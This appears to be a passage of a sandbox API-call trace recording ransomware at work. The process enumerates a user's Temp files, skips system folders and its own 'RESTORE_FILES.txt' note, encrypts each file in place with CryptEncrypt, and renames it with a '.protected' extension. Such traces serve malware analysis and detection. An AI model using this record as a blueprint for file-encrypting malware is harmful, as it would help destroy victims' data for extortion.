[0086.747] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.747] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0086.747] WriteFile (in: hFile=0xd8, 
lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0086.747] CloseHandle (hObject=0xd8) returned 1 [0086.748] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\2glu0d7uHzfV6.jpg.protected") returned 80 [0086.748] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\2glu0d7uHzfV6.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\2glu0d7uhzfv6.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\2glu0d7uHzfV6.jpg.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\2glu0d7uhzfv6.jpg.protected")) returned 1 [0086.749] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.749] lstrcmpiW (lpString1="8L27THzvspU.avi", lpString2="Windows") returned -1 [0086.749] lstrcmpiW (lpString1="8L27THzvspU.avi", lpString2="Program Files") returned -1 [0086.749] lstrcmpiW (lpString1="8L27THzvspU.avi", lpString2="Program Files (x86)") returned -1 [0086.749] lstrcmpiW (lpString1="8L27THzvspU.avi", lpString2="$Recycle.bin") returned 1 [0086.749] lstrcmpiW (lpString1="8L27THzvspU.avi", lpString2="System Volume Information") returned -1 [0086.749] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8L27THzvspU.avi") returned 68 [0086.749] StrStrIW (lpFirst="8L27THzvspU.avi", lpSrch=".protected") returned 0x0 [0086.749] lstrcmpW (lpString1="8L27THzvspU.avi", lpString2="RESTORE_FILES.txt") returned -1 [0086.749] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0086.750] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, 
pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0086.750] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8L27THzvspU.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\8l27thzvspu.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.750] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8L27THzvspU.avi") returned 68 [0086.750] StrStrW (lpFirst="8L27THzvspU.avi", lpSrch=".txt") returned 0x0 [0086.750] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8L27THzvspU.avi") returned 68 [0086.750] StrStrW (lpFirst="8L27THzvspU.avi", lpSrch=".rar") returned 0x0 [0086.750] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8L27THzvspU.avi") returned 68 [0086.750] StrStrW (lpFirst="8L27THzvspU.avi", lpSrch=".zip") returned 0x0 [0086.750] ReadFile (in: hFile=0xd8, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.751] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.751] WriteFile (in: hFile=0xd8, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.752] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.752] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | 
out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0086.752] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0086.752] CloseHandle (hObject=0xd8) returned 1 [0086.752] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8L27THzvspU.avi.protected") returned 78 [0086.753] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8L27THzvspU.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\8l27thzvspu.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8L27THzvspU.avi.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\8l27thzvspu.avi.protected")) returned 1 [0086.754] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.754] lstrcmpiW (lpString1="9yt Tv-cP5-7sI.bmp", lpString2="Windows") returned -1 [0086.754] lstrcmpiW (lpString1="9yt Tv-cP5-7sI.bmp", lpString2="Program Files") returned -1 [0086.754] lstrcmpiW (lpString1="9yt Tv-cP5-7sI.bmp", lpString2="Program Files (x86)") returned -1 [0086.754] lstrcmpiW (lpString1="9yt Tv-cP5-7sI.bmp", lpString2="$Recycle.bin") returned 1 [0086.754] lstrcmpiW (lpString1="9yt Tv-cP5-7sI.bmp", lpString2="System Volume Information") returned -1 [0086.754] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\9yt Tv-cP5-7sI.bmp") returned 71 [0086.754] StrStrIW (lpFirst="9yt Tv-cP5-7sI.bmp", lpSrch=".protected") returned 0x0 [0086.754] lstrcmpW (lpString1="9yt Tv-cP5-7sI.bmp", lpString2="RESTORE_FILES.txt") returned -1 [0086.754] CryptGenRandom (in: hProv=0x444d38, 
dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0086.754] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0086.755] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\9yt Tv-cP5-7sI.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\9yt tv-cp5-7si.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.755] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\9yt Tv-cP5-7sI.bmp") returned 71 [0086.755] StrStrW (lpFirst="9yt Tv-cP5-7sI.bmp", lpSrch=".txt") returned 0x0 [0086.755] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\9yt Tv-cP5-7sI.bmp") returned 71 [0086.755] StrStrW (lpFirst="9yt Tv-cP5-7sI.bmp", lpSrch=".rar") returned 0x0 [0086.755] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\9yt Tv-cP5-7sI.bmp") returned 71 [0086.755] StrStrW (lpFirst="9yt Tv-cP5-7sI.bmp", lpSrch=".zip") returned 0x0 [0086.755] ReadFile (in: hFile=0xd8, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.756] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.756] WriteFile (in: hFile=0xd8, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.757] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: 
lpNewFilePointer=0x0) returned 1 [0086.757] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0086.757] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0086.757] CloseHandle (hObject=0xd8) returned 1 [0086.758] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\9yt Tv-cP5-7sI.bmp.protected") returned 81 [0086.758] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\9yt Tv-cP5-7sI.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\9yt tv-cp5-7si.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\9yt Tv-cP5-7sI.bmp.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\9yt tv-cp5-7si.bmp.protected")) returned 1 [0086.759] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.759] lstrcmpiW (lpString1="AdobeARM.log", lpString2="Windows") returned -1 [0086.759] lstrcmpiW (lpString1="AdobeARM.log", lpString2="Program Files") returned -1 [0086.759] lstrcmpiW (lpString1="AdobeARM.log", lpString2="Program Files (x86)") returned -1 [0086.759] lstrcmpiW (lpString1="AdobeARM.log", lpString2="$Recycle.bin") returned 1 [0086.759] lstrcmpiW (lpString1="AdobeARM.log", lpString2="System Volume Information") returned -1 [0086.759] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\AdobeARM.log") returned 65 [0086.759] StrStrIW (lpFirst="AdobeARM.log", lpSrch=".protected") returned 
0x0 [0086.759] lstrcmpW (lpString1="AdobeARM.log", lpString2="RESTORE_FILES.txt") returned -1 [0086.759] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0086.759] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0086.759] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\AdobeARM.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\adobearm.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.760] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\AdobeARM.log") returned 65 [0086.760] StrStrW (lpFirst="AdobeARM.log", lpSrch=".txt") returned 0x0 [0086.760] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\AdobeARM.log") returned 65 [0086.760] StrStrW (lpFirst="AdobeARM.log", lpSrch=".rar") returned 0x0 [0086.760] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\AdobeARM.log") returned 65 [0086.760] StrStrW (lpFirst="AdobeARM.log", lpSrch=".zip") returned 0x0 [0086.760] ReadFile (in: hFile=0xd8, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ec94*=0x2c3, lpOverlapped=0x0) returned 1 [0086.761] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xfffffd3d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.761] WriteFile (in: hFile=0xd8, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2c3, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ec94*=0x2c3, lpOverlapped=0x0) returned 1 [0086.761] SetFilePointerEx 
(in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.762] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0086.762] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0086.762] CloseHandle (hObject=0xd8) returned 1 [0086.762] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\AdobeARM.log.protected") returned 75 [0086.762] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\AdobeARM.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\adobearm.log"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\AdobeARM.log.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\adobearm.log.protected")) returned 1 [0086.764] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.764] lstrcmpiW (lpString1="b216xYQc4dbOqNDNEB5.wav", lpString2="Windows") returned -1 [0086.764] lstrcmpiW (lpString1="b216xYQc4dbOqNDNEB5.wav", lpString2="Program Files") returned -1 [0086.764] lstrcmpiW (lpString1="b216xYQc4dbOqNDNEB5.wav", lpString2="Program Files (x86)") returned -1 [0086.764] lstrcmpiW (lpString1="b216xYQc4dbOqNDNEB5.wav", lpString2="$Recycle.bin") returned 1 [0086.764] lstrcmpiW (lpString1="b216xYQc4dbOqNDNEB5.wav", lpString2="System Volume Information") returned -1 [0086.764] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Temp\\b216xYQc4dbOqNDNEB5.wav") returned 76 [0086.764] StrStrIW (lpFirst="b216xYQc4dbOqNDNEB5.wav", lpSrch=".protected") returned 0x0 [0086.764] lstrcmpW (lpString1="b216xYQc4dbOqNDNEB5.wav", lpString2="RESTORE_FILES.txt") returned -1 [0086.764] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0086.764] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0086.764] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\b216xYQc4dbOqNDNEB5.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\b216xyqc4dboqndneb5.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.764] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\b216xYQc4dbOqNDNEB5.wav") returned 76 [0086.764] StrStrW (lpFirst="b216xYQc4dbOqNDNEB5.wav", lpSrch=".txt") returned 0x0 [0086.764] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\b216xYQc4dbOqNDNEB5.wav") returned 76 [0086.764] StrStrW (lpFirst="b216xYQc4dbOqNDNEB5.wav", lpSrch=".rar") returned 0x0 [0086.764] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\b216xYQc4dbOqNDNEB5.wav") returned 76 [0086.765] StrStrW (lpFirst="b216xYQc4dbOqNDNEB5.wav", lpSrch=".zip") returned 0x0 [0086.765] ReadFile (in: hFile=0xd8, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.765] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 
[0086.765] WriteFile (in: hFile=0xd8, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.766] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.766] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0086.766] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0086.766] CloseHandle (hObject=0xd8) returned 1 [0086.767] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\b216xYQc4dbOqNDNEB5.wav.protected") returned 86 [0086.767] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\b216xYQc4dbOqNDNEB5.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\b216xyqc4dboqndneb5.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\b216xYQc4dbOqNDNEB5.wav.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\b216xyqc4dboqndneb5.wav.protected")) returned 1 [0086.768] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.768] lstrcmpiW (lpString1="CB2RyEvFAWK7v0b3Rq.mkv", lpString2="Windows") returned -1 [0086.768] lstrcmpiW (lpString1="CB2RyEvFAWK7v0b3Rq.mkv", lpString2="Program Files") returned -1 [0086.768] lstrcmpiW (lpString1="CB2RyEvFAWK7v0b3Rq.mkv", lpString2="Program Files (x86)") returned -1 [0086.768] lstrcmpiW 
(lpString1="CB2RyEvFAWK7v0b3Rq.mkv", lpString2="$Recycle.bin") returned 1 [0086.768] lstrcmpiW (lpString1="CB2RyEvFAWK7v0b3Rq.mkv", lpString2="System Volume Information") returned -1 [0086.768] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\CB2RyEvFAWK7v0b3Rq.mkv") returned 75 [0086.768] StrStrIW (lpFirst="CB2RyEvFAWK7v0b3Rq.mkv", lpSrch=".protected") returned 0x0 [0086.768] lstrcmpW (lpString1="CB2RyEvFAWK7v0b3Rq.mkv", lpString2="RESTORE_FILES.txt") returned -1 [0086.768] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0086.768] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0086.768] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\CB2RyEvFAWK7v0b3Rq.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\cb2ryevfawk7v0b3rq.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.769] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\CB2RyEvFAWK7v0b3Rq.mkv") returned 75 [0086.769] StrStrW (lpFirst="CB2RyEvFAWK7v0b3Rq.mkv", lpSrch=".txt") returned 0x0 [0086.769] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\CB2RyEvFAWK7v0b3Rq.mkv") returned 75 [0086.769] StrStrW (lpFirst="CB2RyEvFAWK7v0b3Rq.mkv", lpSrch=".rar") returned 0x0 [0086.769] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\CB2RyEvFAWK7v0b3Rq.mkv") returned 75 [0086.769] StrStrW (lpFirst="CB2RyEvFAWK7v0b3Rq.mkv", lpSrch=".zip") returned 0x0 [0086.769] ReadFile (in: hFile=0xd8, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, 
lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.770] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.770] WriteFile (in: hFile=0xd8, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.771] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.771] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0086.771] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0086.771] CloseHandle (hObject=0xd8) returned 1 [0086.771] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\CB2RyEvFAWK7v0b3Rq.mkv.protected") returned 85 [0086.772] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\CB2RyEvFAWK7v0b3Rq.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\cb2ryevfawk7v0b3rq.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\CB2RyEvFAWK7v0b3Rq.mkv.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\cb2ryevfawk7v0b3rq.mkv.protected")) returned 1 [0086.773] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.773] lstrcmpiW 
(lpString1="Cookies", lpString2="Windows") returned -1 [0086.773] lstrcmpiW (lpString1="Cookies", lpString2="Program Files") returned -1 [0086.773] lstrcmpiW (lpString1="Cookies", lpString2="Program Files (x86)") returned -1 [0086.773] lstrcmpiW (lpString1="Cookies", lpString2="$Recycle.bin") returned 1 [0086.773] lstrcmpiW (lpString1="Cookies", lpString2="System Volume Information") returned -1 [0086.773] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Cookies") returned 60 [0086.773] lstrcmpW (lpString1="Cookies", lpString2=".") returned 1 [0086.773] lstrcmpW (lpString1="Cookies", lpString2="..") returned 1 [0086.773] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Cookies\\*") returned 62 [0086.773] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Cookies\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0086.774] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 